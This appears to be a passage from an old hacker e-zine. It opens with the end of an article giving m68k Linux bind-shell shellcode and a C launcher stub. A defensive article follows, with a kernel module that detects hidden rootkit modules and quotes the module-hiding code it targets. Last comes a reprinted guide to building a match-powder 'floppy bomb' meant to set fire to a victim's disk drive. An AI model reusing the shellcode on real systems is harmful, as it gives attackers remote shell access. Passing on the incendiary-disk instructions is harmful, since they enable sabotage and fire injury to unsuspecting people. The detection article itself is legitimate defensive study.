"\x70\x01"           	      /*  moveq #1,%d0          */
"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */ 
"\xb1\x80"           	      /*  eorl %d0,%d0          */
"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */ 
"\x24\x0f"           	      /*  movel %sp,%d2         */
"\x70\x66"           	      /*  moveq #102,%d0        */
"\x72\x01"           	      /*  moveq #1,%d1          */
"\x4e\x40"           	      /*  trap #0               */
"\x2e\x80"           	      /*  movel %d0,%sp@        */
"\x30\x3c\x00\xc8"     	      /*  movew #200,%d0        */
"\x2f\x40\x00\x0c"     	      /*  movel %d0,%sp@(12)    */
"\xb1\x80"           	      /*  eorl %d0,%d0          */ 
"\x2f\x40\x00\x10"     	      /*  movel %d0,%sp@(16)    */
"\x70\x02"           	      /*  moveq #2,%d0          */
"\x2f\x40\x00\x14"            /*  movel %d0,%sp@(20)    */
"\x41\xef\x00\x0c"     	      /*  lea %sp@(12),%a0      */
"\x2f\x48\x00\x04"     	      /*  movel %a0,%sp@(4)     */
"\x70\x10"           	      /*  moveq #16,%d0         */
"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */ 
"\x70\x66"           	      /*  moveq #102,%d0        */ 
"\x72\x02"           	      /*  moveq #2,%d1          */
"\x4e\x40"           	      /*  trap #0               */
"\x70\x01"           	      /*  moveq #1,%d0          */ 
"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */  
"\x70\x66"           	      /*  moveq #102,%d0        */
"\x72\x04"           	      /*  moveq #4,%d1          */
"\x4e\x40"           	      /*  trap #0               */
"\xb1\x80"           	      /*  eorl %d0,%d0          */  
"\x2f\x40\x00\x04"     	      /*  movel %d0,%sp@(4)     */ 
"\x2f\x40\x00\x08"     	      /*  movel %d0,%sp@(8)     */
"\x70\x66"           	      /*  moveq #102,%d0        */
"\x72\x05"           	      /*  moveq #5,%d1          */ 
"\x4e\x40"           	      /*  trap #0               */
"\x22\x00"           	      /*  movel %d0,%d1         */
"\x70\x3f"           	      /*  moveq #63,%d0         */
"\x74\x00"           	      /*  moveq #0,%d2          */ 
"\x4e\x40"           	      /*  trap #0               */
"\x22\x00"           	      /*  movel %d0,%d1         */
"\x70\x3f"           	      /*  moveq #63,%d0         */
"\x74\x01"           	      /*  moveq #1,%d2          */
"\x4e\x40"           	      /*  trap #0               */  
"\x22\x00"           	      /*  movel %d0,%d1         */
"\x70\x3f"           	      /*  moveq #63,%d0         */
"\x74\x02"           	      /*  moveq #2,%d2          */
"\x4e\x40"           	      /*  trap #0               */
"\x70\x0b"           	      /*  moveq #11,%d0         */ 
"\x48\x79\x2f\x2f\x73\x68"    /*  pea 2f2f7368          */
"\x48\x79\x2f\x62\x69\x6e"    /*  pea 2f62696e          */ 
"\x22\x0f"           	      /*  movel %sp,%d1         */
"\xb5\x82"           	      /*  eorl %d2,%d2          */
"\x2f\x02"           	      /*  movel %d2,%sp@-       */
"\x48\x78\x01\x30"            /*  pea 130               */
"\x24\x0f"           	      /*  movel %sp,%d2         */ 
"\x26\x02"           	      /*  movel %d2,%d3         */ 
"\x4e\x40";           	      /*  trap #0               */

main()
{
 int *ret;
 ret=(int *)&ret +2;
 *ret = bind_shellcode;
}


 p.s. as always - sorry for my poor english.


 VI. References.
 
 [1] http://e-www.motorola.com/collateral/M68000PRM.pdf  - programmer's manual
 [2] http://e-www.motorola.com/brdata/PDFDB/docs/MC68060UM.pdf - user's manual
 [3] http://www.lsd-pl.net/documents/asmcodes-1.0.2.pdf        - good tutorial


|=-----------------------------------------------------------------------=|
|=-=[ 6 - Finding hidden kernel modules (the extrem way) ]=--------------=|
|=-----------------------------------------------------------------------=|

by madsys 


1 Introduction
2 The technique of module hiding
3 Countermeasure -- brute force
4 Problem of unmapped
5 Greetings
6 References
7 Code


1 Introduction
==============

This paper presents a method for how to find out the hidden modules in
linux system. Generaly speaking, most of the attackers intend to hide
their modules after taking down the victim. They like this way to prevent
the change of kernel from being detected by the administrator. As modules
were linked to a singly linked chain, the original one was unable to be
recovered while some modules have been removed. In this sense, to retrieve
the hidden modules came up to be hard. Essential C skill and primary
knowledge of linux kernel are needed.


2 The technique of module hiding
================================

First of all, the most popular and general technique of module hiding 
and the quomodo of application to get module's list were examined.
An implement of module hiding was shown as below:

    ----snip----
    struct module *p;
    
    for (p=&__this_module; p->next; p=p->next)
        {
            if (strcmp(p->next->name, str))
                continue;
            p->next=p->next->next;        // <-- here it 
removes that module
                break;
        }
    
    ----snip----

As you can see, in order to hide one module, the unidirectional chain was 
modified, and following is a snippet of sys_create_module() system call, 
which might tell why the technique worked:

    ----snip----
    spin_lock_irqsave(&modlist_lock, flags);
    mod->next = module_list;
    module_list = mod;    /* link it in */
    spin_unlock_irqrestore(&modlist_lock, flags);
    ----snip----

A conclusion could be made: modules linked to the end of unidirectional 
chain when they were created.

"lsmod" is an application on linux for listing current loaded modules, 
which uses sys_query_module() system call to get the listing of loaded 
modules, and qm_modules() is the actual function called by it while 
querying modules:


static int qm_modules(char *buf, size_t bufsize, size_t *ret)
{
    struct module *mod;
    size_t nmod, space, len;

    nmod = space = 0;

    for (mod=module_list; mod != &kernel_module; mod=mod->next, 
++nmod) {
        len = strlen(mod->name)+1;
        if (len > bufsize)
            goto calc_space_needed;
        if (copy_to_user(buf, mod->name, len))
            return -EFAULT;
        buf += len;
        bufsize -= len;
        space += len;
    }

    if (put_user(nmod, ret))
        return -EFAULT;
    else
        return 0;

calc_space_needed:
    space += len;
    while ((mod = mod->next) != &kernel_module)
        space += strlen(mod->name)+1;

    if (put_user(space, ret))
        return -EFAULT;
    else
        return -ENOSPC;
}

    note: pointer module_list is always at the head of the singly linked
chain. It clearly showing the technique of hiding module was valid.


3 Countermeasure -- brute force
===============================

According to the technique of hiding module, brute force might be useful.
sys_creat_module() system call was expressed as below. 

    --snip--
    if ((mod = (struct module *)module_map(size)) == NULL) {
        error = -ENOMEM;
        goto err1;
    }
    --snip--

    and the macro module_map in "asm/module.h": 
    #define module_map(x)    vmalloc(x)


You should have noticed that the function calls vmalloc() to allocate the
module struct. So the size limitation of vmalloc zone for brute force is
able to be exploited to determine what modules in our system on earth.
As you know, the vmalloc zone is 128M(2.2, 2.4 kernel, there are many
inanition zones in it), however, any allocated module should be aligned by
4K. Therefor, the theoretical maximum number we were supposed to detect
was 128M/4k=32768.

4 Problem of unmapped
=====================

By far, maybe you think: umm, it's very easy to use brute force to list
those evil modules". But it is not true because of an important
reason: it is possible that the address which you are accessing is
unmapped, thus it can cause a paging fault and the kernel would report:
"Unable to handle kernel paging request at virtual address".

So we must make sure the address we are accessing is mapped. The solution
is to verify the validity of the corresponding entry in kernel
pgd(swapper_pg_dir) and the corresponding entry in page table.Furthermore,
we were supposed to make sure the content of address pointed by "name"
pointer(in struct module) was valid. Because the 768~1024 entries of user
process's pgd were synchronous with kerenl pgd, and that was why such
hardcore address of kernel pgd (0xc0101000) was used.


following is the function for validating those entries in pgd or pgt:

int valid_addr(unsigned long address)
{
    unsigned long page;

    if (!address)
        return 0;

    page = ((unsigned long *)0xc0101000)[address >> 22];        
//pde
    if (page & 1)
    {
        page &= PAGE_MASK;
        address &= 0x003ff000;
        page = ((unsigned long *) __va(page))[address >> 
PAGE_SHIFT];    //pte
        if (page)
            return 1;
    }
    
    return 0;
}

After validating those addresses which we would check, the next step would
be easy -- just brute force. As the list of modules including hidden
modules had been created, you could compare it with the output of "lsmod".
Then you can find out those evil modules and get rid of them freely.


5 Greetings
===========

Shout to uberhax0rs@linuxforum.net


6 Code
======

-----BEGING MODULE_HUNTER.C-----
/* 
 * module_hunter.c: Search for patterns in the kernel address space that
 * look like module structures. This tools find hidden modules that
 * unlinked themself from the chained list of loaded modules.
 *
 * This tool is currently implemented as a module but can be easily ported
 * to a userland application (using /dev/kmem).
 * 
 * Compile with: gcc -c module_hunter.c -I/usr/src/linux/include
 * insmod ./module_hunter.o
 *
 * usage: cat /proc/showmodules && dmesg
 */

#define MODULE
#define __KERNEL__

#include 

#ifdef CONFIG_SMP
#define __SMP__ 
#endif

#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include 
#endif

#include 
#include 
#include 

#include 
#include 


#include 

#include 
#include 


#include 
#include 
#include 

static int errno;


int valid_addr(unsigned long address)
{
    unsigned long page;

    if (!address)
        return 0;

    page = ((unsigned long *)0xc0101000)[address >> 22];        

    if (page & 1)
    {
        page &= PAGE_MASK;
        address &= 0x003ff000;
        page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT];  //pte
        if (page)
            return 1;
    }
    
    return 0;
}

ssize_t
showmodule_read(struct file *unused_file, char *buffer, size_t len, loff_t *off)
{
    struct module *p;

    printk("address                         module\n\n");
    for (p=(struct module *)VMALLOC_START; p<=(struct \
module*)(VMALLOC_START+VMALLOC_RESERVE-PAGE_SIZE); p=(struct module \
*)((unsigned long)p+PAGE_SIZE))
    {
        if (valid_addr((unsigned long)p+ (unsigned long)&((struct \
module *)NULL)->name) && valid_addr(*(unsigned long *)((unsigned long)p+ \
(unsigned long)&((struct module *)NULL)->name)) && strlen(p->name))
            if (*p->name>=0x21 && *p->name<=0x7e && (p->size < 1 <<20))
                printk("0x%p%20s size: 0x%x\n", p, p->name, p->size);
    }

    return 0;
}

static struct file_operations showmodules_ops = {
    read:    showmodule_read,
};

int init_module(int x)
{
    struct proc_dir_entry *entry;

    entry = create_proc_entry("showmodules", S_IRUSR, &proc_root);
    entry->proc_fops = &showmodules_ops;

    return 0;
}

void cleanup_module()
{
    remove_proc_entry("showmodules", &proc_root);
}

MODULE_LICENSE("GPL");
MODULE_AUTHOR("madsysercist.iscas.ac.cn");
-----END MODULE-HUNTER.C-----

|=-----------------------------------------------------------------------=|
|=-=[ 7 - Good old floppy bombs ]=---------------------------------------=|
|=-----------------------------------------------------------------------=|

    [ Note by the editors: We felt like it's time for a re-print of
      some already forgotton fun with pyro techniques. Enjoy. ]

                    ####################################
                    #   How To Make A Diskette Bomb    #
                    #       by Phrick-A-Phrack         #
                    ####################################

Before I even start i want to make it clear that i do NOT take any
responsibility on the use of the information in this document.

This little baby is good to use to stuff up someones computer a little.
It can be adapted to a range of other things.

You will need:

- A disk (3.5" floppys are a good disk to use)
- Scissors
- White or blue kitchen matches (i have not found any other colors that
  work - im not sure why)
- Clear nail polish

What to do:
 
- Carefully open up the diskette
- remove the cotton covering from the inside.
- scrape a lot of match powder into a bowl (use a woodent scraper as metal
  might spark and ignite the match powder)
- After you have a lot, spread it EVENLY on the disk.
- Spread nail polish over the match powder on the disk.
- let it dry.
- carefully put the diskette back together and use the nail plish to seal
  is shut.

How to use it:

Give it to someone you want to give a fright and stuff up their computer
a little. Tell them its got something they are interested in on it. When
they put it in their drive the drive head attempts to read the disk which
causes a small fire - enough heat to melt the disk drive and stuff the
head up!

       ^^Phrick-A-Phrack^^

|=[ EOF ]=---------------------------------------------------------------=|